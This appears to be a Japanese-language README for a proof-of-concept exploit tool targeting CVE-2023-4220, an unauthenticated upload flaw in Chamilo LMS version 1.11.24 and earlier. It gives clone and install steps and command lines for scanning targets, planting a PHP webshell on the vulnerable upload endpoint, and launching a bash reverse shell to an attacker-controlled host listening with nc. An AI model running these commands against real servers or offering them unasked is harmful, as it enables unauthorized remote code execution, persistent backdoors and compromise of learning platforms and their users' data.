
これは、CVE-2023-4220に記載されているChamiloのLMSソフトウェアのセキュリティ脆弱性を悪用するPythonで書かれたスクリプトです。
このスクリプトは、CVE-2023-4220 で説明されている Chamilo's LMS ソフトウェアのセキュリティ上の欠陥を悪用するものです。このシステムは、バージョン 1.11.24 以前で脆弱です。
リポジトリをマシンにクローンし、pip を使用して依存関係をインストールします(virtualenv を使用して、これらのインストールをグローバルインストールから分離する環境を作成することを推奨します)。
git clone https://github.com/m3m0o/chamilo-lms-unauthenticated-big-upload-rce-poc
cd chamilo-lms-unauthenticated-big-upload-rce-poc
pip install -r requirements.txt
このスクリプトは、Chamilo's のルートパス(例:**http://example.com/chamilo**、**http://example.com**、**http://chamilo.example.com**)を含む ターゲット URL と、実行するアクション(scan、webshell、revshell の3つが利用可能)が必要です。
このアクションは、エンドポイント /main/inc/lib/javascript/bigupload/files/ にアクセスして、ターゲットが脆弱かどうかをチェックします。
python3 main.py -u http://example.com/chamilo -a scan

このアクションは、脆弱なエンドポイントに PHP webshell ファイルを作成します。
python3 main.py -u http://example.com/chamilo -a webshell

このアクションは、bash リバースシェル ファイルを作成して実行します。これを行うには、まず前のアクションと同じ方法で webshell を作成します。その後、いくつかのコマンドを実行して bash ファイルを作成・実行します。必ず、nc またはその他のユーティリティを使用して定義したポートで待ち受けし、リバース接続を実際に受け取れるようにしてください。また、ホストは有効な 内部/公開 IPv4(例:172.17.1.4 や 186.227.4.31)でも、登録したドメイン(例:evil-vps.domainreg.net)でも構いません。
python3 main.py -u http://example.com/chamilo -a revshell

注: まもなく、Windows ホスト向けの Windows ペイロードオプションを追加する予定です。